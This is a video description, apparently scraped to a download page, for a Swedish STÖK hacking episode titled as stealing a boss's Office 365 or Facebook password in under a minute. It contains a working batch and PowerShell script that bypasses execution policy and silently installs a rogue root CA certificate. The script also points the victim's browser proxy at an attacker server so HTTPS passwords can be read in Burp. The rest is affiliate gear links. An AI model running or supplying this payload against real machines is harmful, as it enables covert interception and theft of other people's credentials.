STÖK - MITM SSL PROXY INCEPTION - Sno chefens Office 365 / Facebook lösenord på under 1 minut. скачать в хорошем качестве

STÖK - MITM SSL PROXY INCEPTION - Sno chefens Office 365 / Facebook lösenord på under 1 minut.

I det här avsnittet av STÖK kör vi ett enkelt powershell script via USB som installerar ett ful root CA cert och ställer samtidigt om offrets maskin så den surfar via vår proxy server i azure. Vi avkodar sedan SSL krypteringen via en BURP proxy och snor lösenord över HTTPS i klartext. Attacken bygger på Microsofts egna programvaror, Kali Linux och Burp Proxy, eftersom användaren är lokal admin på järnet passerar attacken helt och hållet förbi samtliga skyddsmekanismer på under 1 sekund. Det vi gör är inget konstigt och är fully supported. Saken är den att detta är något som allt fler stora företag roar sig för att komma åt hackers/randsomware. De kan alltså läsa dina lösenord utan att du vet om det. Offer datorn är max patchad och har både en tredjeparts Machine Learning antivirus/malware lösning aktiv samt ytterligare ett tredjepart system som skall blockera all okänd skadlig kod. 150.000 kronors brandväggen som trafiken går via kör både avancerade applikations blockeringar och utökade kontroller. nuff said.. Vi gör detta i forskningssyfte eftersom vi MÅSTE ifrågasätta de verktyg vi användare ibland blint förlitar oss på.. Som tex endpoint protection, patchade os och dyra brandväggar. Nothing is secure.. --securesurf.cmd-- @echo off echo. invoke powershellbypassmagic.. powershell.exe -ep Bypass "& {Get-Content d:\enableproxy_ca.ps1 | iex} echo. done. pause --enableproxy_ca.ps1-- $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2("d:\cacert.der") $rootStore = Get-Item cert:\LocalMachine\Root $rootStore.Open("ReadWrite") $rootStore.Add($cert) $rootStore.Close() $reg = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" Set-ItemProperty -Path $reg -Name ProxyServer -Value "your ip / hostname goes here" Set-ItemProperty -Path $reg -Name ProxyEnable -Value 1 Fredrik Alexandersson [email protected] Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution. https://www.kali.org/ Burp or Burp Suite is a graphical tool for testing Web application security. https://portswigger.net/burp/ ------------ --- If you also want to get that STÖK vibe, here's my gear, --CAMERA / STUDIO GEAR- PANASONIC LUMIX GH5 4K https://amzn.to/2LIfDf9 Nikon D850 https://amzn.to/2xzjO4m DJI Osmo Pocket https://amzn.to/30ppbzP Nikon AF-S FX NIKKOR 50mm f/1.4G https://amzn.to/2GbQjuv PANASONIC LUMIX 12-35mm Camera Lens G X VARIO II, F2.8 https://amzn.to/2G12EBp Rode VideoMicro Compact https://amzn.to/2JsYEdT Tascam DR-70D 4-Track Portable Audio Recorder https://amzn.to/2XtVvnS Blackmagic Design UltraStudio Mini Recorder - Thunderbolt https://amzn.to/2JyhBfr -COMPUTER- Apple MacBook Pro https://amzn.to/30gM0p9 Dell Precision M5510 WorkStation https://amzn.to/2XwNEGg Dell U3419w Ultrasharp 34-Inch Curved https://amzn.to/2Jyigxr Logitech MX Master 2S Wireless Mouse https://amzn.to/2XCAvf3 Apple Magic Keyboard with Numeric Keypad https://amzn.to/2JhEfcW Logitech HD Pro Webcam C920 https://amzn.to/2LH8awG QNAP TVS-672XT 6 Bay Thunderbolt 3 NAS https://amzn.to/2LHIUqb -STUDIO LIGHTS- Philips Hue Smart Hub https://amzn.to/2Xx4Hbd Philips Hue Single Premium Smart Bulb, 16 million colors, https://amzn.to/2LCODxk Philips Hue Smart Dimmer Switch with Remote https://amzn.to/2XtWbJW Softbox Lighting Kit https://amzn.to/2LGZEhs ------------- -- STÖK LOVES: https://www.hackerone.com/ Https://www.bugcrowd.com https://www.dedicatedbrand.com https://www.chpobrand.com https://www.epidemicsound.com/ https://www.thrivestore.se/